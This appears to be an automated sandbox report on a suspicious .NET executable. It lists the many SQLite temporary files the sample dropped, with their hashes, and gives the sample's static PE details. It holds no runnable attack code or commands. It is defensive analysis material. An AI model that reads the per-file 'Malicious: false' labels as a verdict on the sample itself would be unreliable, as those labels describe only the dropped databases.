SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp971F.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9720.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9731.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9741.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9752.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9762.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9F8.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9F9.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA09.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA0A.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA0B.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA1C.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA2C.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA3D.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA3E.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA4F.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA5F.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD0B3.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD0D4.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD103.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD114.tmp

Download File

Process:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.669712636318516
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	ljMiHZ8MwZ.exe
File size:	591'360 bytes
MD5:	4153363158f713a02e405d251823c0c3
SHA1:	35168f14fa36d3f8d15614cb25a78415015691d1
SHA256:	a040d59da6528f88ded3b130199a23f33f01e9b049b89c0cceaabc5c6984bb26
SHA512:	c0bfbb1f13aa7e494369684d74f76deff4390d4910bcabe7bee75caef0eed8a813ef6ea73442cfdb86b6cc0b6a29222d5fcd67a6ed6742eb6eee92c58c83255f
SSDEEP:	12288:Om0+u3F55OHTDPJg6i6XGoVnpVn9SIRlwXkMWqsHG6xSd6Ys+tA2Zc:O5FXOPhi6hVn3c0wXkB6IS03+R
TLSH:	BFC401AC2A08E817C8555BF40A31F6B827354EEDA901D3875FD8BEEF7962F960D41183
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.jg................................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	1bb3b3b3b3d389b3

Static PE Info

General

Entrypoint:	0x4907c6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x676A0653 [Tue Dec 24 00:54:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9076c	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x92000	0x1960	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x94000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8e7cc	0x8e800	ce4243b4dc36c806003a49c68d7e461b	False	0.8895439281798245	data	7.678717951671746	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
